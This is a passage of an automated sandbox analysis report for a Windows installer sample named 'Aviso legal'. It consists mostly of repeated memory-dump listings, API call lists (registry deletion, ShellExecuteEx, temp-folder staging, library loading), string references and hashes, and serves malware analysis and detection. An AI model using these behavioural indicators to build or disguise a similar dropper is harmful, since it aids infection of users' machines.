                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 3449924974-3355392842
                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 766 402ea9-402ed2 call 4063aa 768 402ed7-402edb 766->768 769 402ee1-402ee5 768->769 770 402f8c-402f90 768->770 771 402ee7-402f08 RegEnumValueW 769->771 772 402f0a-402f1d 769->772 771->772 773 402f71-402f7f RegCloseKey 771->773 774 402f46-402f4d RegEnumKeyW 772->774 773->770 775 402f1f-402f21 774->775 776 402f4f-402f61 RegCloseKey call 40690a 774->776 775->773 777 402f23-402f37 call 402ea9 775->777 782 402f81-402f87 776->782 783 402f63-402f6f RegDeleteKeyW 776->783 777->776 784 402f39-402f45 777->784 782->770 783->770 784->774
                                APIs
                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CloseEnum$DeleteValue
                                • String ID:
                                • API String ID: 1354259210-0
                                • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 785 705b1817-705b1856 call 705b1bff 789 705b185c-705b1860 785->789 790 705b1976-705b1978 785->790 791 705b1869-705b1876 call 705b2480 789->791 792 705b1862-705b1868 call 705b243e 789->792 797 705b1878-705b187d 791->797 798 705b18a6-705b18ad 791->798 792->791 801 705b1898-705b189b 797->801 802 705b187f-705b1880 797->802 799 705b18af-705b18cb call 705b2655 call 705b1654 call 705b1312 GlobalFree 798->799 800 705b18cd-705b18d1 798->800 824 705b1925-705b1929 799->824 807 705b191e-705b1924 call 705b2655 800->807 808 705b18d3-705b191c call 705b1666 call 705b2655 800->808 801->798 803 705b189d-705b189e call 705b2e23 801->803 805 705b1888-705b1889 call 705b2b98 802->805 806 705b1882-705b1883 802->806 816 705b18a3 803->816 819 705b188e 805->819 812 705b1890-705b1896 call 705b2810 806->812 813 705b1885-705b1886 806->813 807->824 808->824 823 705b18a5 812->823 813->798 813->805 816->823 819->816 823->798 828 705b192b-705b1939 call 705b2618 824->828 829 705b1966-705b196d 824->829 835 705b193b-705b193e 828->835 836 705b1951-705b1958 828->836 829->790 831 705b196f-705b1970 GlobalFree 829->831 831->790 835->836 837 705b1940-705b1948 835->837 836->829 838 705b195a-705b1965 call 705b15dd 836->838 837->836 839 705b194a-705b194b FreeLibrary 837->839 838->829 839->836
                                APIs
                                  • Part of subcall function 705B1BFF: GlobalFree.KERNEL32(?), ref: 705B1E74
                                  • Part of subcall function 705B1BFF: GlobalFree.KERNEL32(?), ref: 705B1E79
                                  • Part of subcall function 705B1BFF: GlobalFree.KERNEL32(?), ref: 705B1E7E
                                • GlobalFree.KERNEL32(00000000), ref: 705B18C5
                                • FreeLibrary.KERNEL32(?), ref: 705B194B
                                • GlobalFree.KERNELBASE(00000000), ref: 705B1970
                                  • Part of subcall function 705B243E: GlobalAlloc.KERNEL32(00000040,?), ref: 705B246F
                                  • Part of subcall function 705B2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,705B1896,00000000), ref: 705B28E0
                                  • Part of subcall function 705B1666: wsprintfW.USER32 ref: 705B1694
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1427938394.00000000705B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 705B0000, based on PE: true
                                • Associated: 00000000.00000002.1427870963.00000000705B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.1427971257.00000000705B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.1428000657.00000000705B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_705b0000_Aviso legal.jbxd
                                Similarity
                                • API ID: Global$Free$Alloc$Librarywsprintf
                                • String ID:
                                • API String ID: 3962662361-3916222277
                                • Opcode ID: daf8e5250971ac891dd8e3751d34e5d77a38c5a872c1a55a1b476c3d58694f19
                                • Instruction ID: bd3168cc8726e400070eeb6ef8a8baebc08f711f1983b2982c3fe75b5145718f
                                • Opcode Fuzzy Hash: daf8e5250971ac891dd8e3751d34e5d77a38c5a872c1a55a1b476c3d58694f19
                                • Instruction Fuzzy Hash: 3741B4724002899BCB919F20DC8DB9D3FAEBF05350F54456AF9069E285DB7CB8848B64
                                APIs
                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nscAAC8.tmp,00000023,00000011,00000002), ref: 004024D5
                                • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nscAAC8.tmp,00000000,00000011,00000002), ref: 00402515
                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscAAC8.tmp,00000000,00000011,00000002), ref: 004025FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CloseValuelstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp
                                • API String ID: 2655323295-16301701
                                • Opcode ID: 3f2741e17913f4b3ae47e715a678bc9f1b76d5c80f35dbb4c6e867a5b8f0e772
                                • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                • Opcode Fuzzy Hash: 3f2741e17913f4b3ae47e715a678bc9f1b76d5c80f35dbb4c6e867a5b8f0e772
                                • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                APIs
                                • GetTickCount.KERNEL32 ref: 0040607A
                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CountFileNameTempTick
                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                • API String ID: 1716503409-944333549
                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                APIs
                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll), ref: 00402695
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: lstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp$C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll
                                • API String ID: 1659193697-3934058930
                                • Opcode ID: a2d9691ea381e88d042a05527e8249a96b52758ce21b98351f65b3f5d82e54dc
                                • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                • Opcode Fuzzy Hash: a2d9691ea381e88d042a05527e8249a96b52758ce21b98351f65b3f5d82e54dc
                                • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                APIs
                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp, 4u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75E03420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                  • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid,?,00000000,000000F0), ref: 0040164D
                                Strings
                                • C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid, xrefs: 00401640
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                • String ID: C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid
                                • API String ID: 1892508949-3639820270
                                • Opcode ID: e89a9e6a3f09ade376d0d4b3fd71c203f5cd3ef8be9bd613e1140dffb9deb40c
                                • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                • Opcode Fuzzy Hash: e89a9e6a3f09ade376d0d4b3fd71c203f5cd3ef8be9bd613e1140dffb9deb40c
                                • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                APIs
                                  • Part of subcall function 00405B63: ShellExecuteExW.SHELL32(?), ref: 00405B72
                                  • Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
                                  • Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32(?,?), ref: 004069E8
                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401FEB
                                Strings
                                • @, xrefs: 00401F8A
                                • C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid, xrefs: 00401F6A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: ChangeCloseCodeExecuteExitFindNotificationObjectProcessShellSingleWait
                                • String ID: @$C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid
                                • API String ID: 4215836453-2875345375
                                • Opcode ID: e9e6b888b2ac62b7866e10c79cc816c8736e15ae282fdec460a2aeb23ba8a534
                                • Instruction ID: 706d8f23dd4fc365793d21c3b3cee38f3579e955c6bce5a1691758ef83551cc9
                                • Opcode Fuzzy Hash: e9e6b888b2ac62b7866e10c79cc816c8736e15ae282fdec460a2aeb23ba8a534
                                • Instruction Fuzzy Hash: 20115B71E042189ADB50EFB9CA49B8CB6F4BF04304F24447AE405F72C1EBBC89459B18
                                APIs
                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll), ref: 0040645C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID: Call
                                • API String ID: 3356406503-1824292864
                                • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00425A20,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00425A20,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00403418), ref: 004055FA
                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll), ref: 0040560C
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
